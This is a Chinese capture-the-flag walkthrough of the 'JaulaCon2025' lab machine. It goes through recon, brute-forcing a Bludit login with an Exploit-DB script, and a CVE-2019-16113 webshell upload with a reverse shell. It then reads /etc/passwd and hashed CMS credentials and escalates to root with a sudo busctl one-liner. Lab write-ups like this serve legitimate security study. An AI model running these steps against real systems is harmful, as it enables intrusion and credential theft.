TheHackersLabs-JaulaCon2025-Walkthrough
城南花已开 Lv6

信息收集

服务探测

BASH
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e4:1a:e5 VMware, Inc.
192.168.60.135 08:00:27:9a:9b:16 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:f0:6f:4b VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.073 seconds (123.49 hosts/sec). 4 responded
export ip=192.168.60.135
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I don't always scan ports, but when I do, I prefer RustScan.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.135:22
Open 192.168.60.135:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-02 16:55 CST
Initiating ARP Ping Scan at 16:55
Scanning 192.168.60.135 [1 port]
Completed ARP Ping Scan at 16:55, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:55
Completed Parallel DNS resolution of 1 host. at 16:55, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:55
Scanning 192.168.60.135 [2 ports]
Discovered open port 80/tcp on 192.168.60.135
Discovered open port 22/tcp on 192.168.60.135
Completed SYN Stealth Scan at 16:55, 0.08s elapsed (2 total ports)
Nmap scan report for 192.168.60.135
Host is up, received arp-response (0.0080s latency).
Scanned at 2025-04-02 16:55:00 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:9A:9B:16 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
Raw packets sent: 3 (116B) | Rcvd: 27 (2.544KB)

编辑hosts文件,添加域名

BASH
1
2
echo "$ip jaulacon2025.thl"|sudo tee -a /etc/hosts
192.168.60.135 jaulacon2025.thl

枚举目录

BASH
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
❯ gobuster dir -u http://jaulacon2025.thl -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://jaulacon2025.thl
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: zip,txt,php,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 0] [--> http://jaulacon2025.thl/admin/]
/install.php (Status: 200) [Size: 30]
/0 (Status: 200) [Size: 4541]
/robots.txt (Status: 200) [Size: 22]
Progress: 13435 / 280825 (4.78%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 13447 / 280825 (4.79%)
===============================================================
Finished
===============================================================

可以得知存在一个bludit的CMS框架

不过无法得知是什么版本的框架

POC利用爆破

但是有个admin的后台登录地址

我们可以利用这个POC进行爆破登录

Bludit 3.9.2 - Auth Bruteforce Bypass - PHP webapps Exploit

image

image

用户名就是在首页中出现过的Jaulacon2025

不过我直接运行脚本会报编码错误,改一下代码绕过编码解析错误即可

得到登录凭证Jaulacon2025:cassandra

BASH
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
❯ wget https://www.exploit-db.com/download/48942
--2025-04-02 17:17:54-- https://www.exploit-db.com/download/48942
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.13
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.13|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3458 (3.4K) [application/txt]
Saving to: ‘48942’

48942 100%[=======================================================================>] 3.38K --.-KB/s in 0s

2025-04-02 17:17:55 (206 MB/s) - ‘48942’ saved [3458/3458]

❯ python3 48942.py -l http://jaulacon2025.thl/admin/login.php -u user.txt -p /usr/share/wordlists/rockyou.txt
[*] Bludit Auth BF Mitigation Bypass Script by ColdFusionX

……………………省略………………
[←] Brute Force: Testing -> Jaulacon2025:cassandra

[*] SUCCESS !!
[+] Use Credential -> Jaulacon2025:cassandra

image

同时在此版本下还有个通过上传插件可以获取webshell的漏洞

hg8/CVE-2019-16113-PoC: Bludit >= 3.9.2 - Authenticated RCE (CVE-2019-16113)

修改一下地址和账户凭证以及反弹地址

BASH
1
2
3
4
5
6
7
8
9
❯ vi CVE-2019-16113.py
❯ python3 CVE-2019-16113.py
[+] Loggin successful.
[+] Token CSRF: 00d70f50355effa354138eb53aa41f4a257e6cad
[!] Error uploading Shell.
[!] Make sure Bludit version >= 3.9.2.
[+] Shell upload succesful.
[+] .htaccess upload succesful.
[+] Command Execution Successful.

用户提权

监听一下端口

得到两个用户debian JaulaCon2025

BASH
1
2
3
4
5
6
7
8
9
❯ pwncat-cs -lp 4444
[21:41:22] Welcome to pwncat 🐈! __main__.py:164
[21:42:17] received connection from 192.168.60.135:34594 bind.py:84
[21:42:33] 192.168.60.135:34594: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@JaulaCon2025:/var/www/html$ cat /etc/passwd |grep /bin/bash
root:x:0:0:root:/root:/bin/bash
debian:x:1000:1000:debian,,,:/home/debian:/bin/bash
JaulaCon2025:x:1001:1001::/home/JaulaCon2025:/bin/bash

再次信息收集

可以在bl-content/databases中发现用户的数据库信息

其中就包含了JaulaCon2025用户的密码hash

BASH
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
(remote) www-data@JaulaCon2025:/var/www/html/bl-content/databases$ cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Admin",
"firstName": "Administrador",
"lastName": "",
"role": "admin",
"password": "67def80155faa894bfb132889e3825a2718db22f",
"salt": "67e2f74795e73",
"email": "",
"registered": "2025-03-25 19:34:47",
"tokenRemember": "",
"tokenAuth": "70b08e65a3fa16d434ca40e603c99e22",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""
},
"Jaulacon2025": {
"firstName": "",
"lastName": "",
"nickname": "",
"description": "",
"role": "author",
"password": "a0fcd99fe4a21f30abd2053b1cf796da628e4e7e",
"salt": "bo22u72!",
"email": "",
"registered": "2025-03-25 19:43:25",
"tokenRemember": "",
"tokenAuth": "d1ed37a30b769e2e48123c3efaa1e357",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"codepen": "",
"instagram": "",
"github": "",
"gitlab": "",
"linkedin": "",
"mastodon": ""
},
"JaulaCon2025": {
"firstName": "",
"lastName": "",
"nickname": "",
"description": "",
"role": "author",
"password": "551211bcd6ef18e32742a73fcb85430b",
"salt": "jejej",
"email": "",
"registered": "2025-03-25 19:43:25",
"tokenRemember": "",
"tokenAuth": "d1ed37a30b769e2e48123c3efaa1e357",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"codepen": "",
"instagram": "",
"github": "",
"gitlab": "",
"linkedin": "",
"mastodon": ""
}
}

尝试在线网站爆破一下

得到凭证JaulaCon2025:Brutales

image

尝试登录一下

BASH
1
2
3
4
5
6
(remote) www-data@JaulaCon2025:/var/www/html/bl-content/databases$ su JaulaCon2025
Password:
JaulaCon2025@JaulaCon2025:/var/www/html/bl-content/databases$ cd ~
JaulaCon2025@JaulaCon2025:~$ cat user.txt
368409a919088e8707d0617365156184 -
JaulaCon2025@JaulaCon2025:~$

Root提权

得知存在用户拥有sudo权限

正常提权即可

BASH
1
2
3
4
5
6
7
8
9
10
11
12
JaulaCon2025@JaulaCon2025:~$ sudo -l
sudo: unable to resolve host JaulaCon2025: Nombre o servicio desconocido
Matching Defaults entries for JaulaCon2025 on JaulaCon2025:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User JaulaCon2025 may run the following commands on JaulaCon2025:
(root) NOPASSWD: /usr/bin/busctl
JaulaCon2025@JaulaCon2025:~$ sudo /usr/bin/busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'
sudo: unable to resolve host JaulaCon2025: Nombre o servicio desconocido
root@JaulaCon2025:/home/JaulaCon2025# cd ~
root@JaulaCon2025:~# cat root.txt
097fac9db83a1806f3355cf95227992a -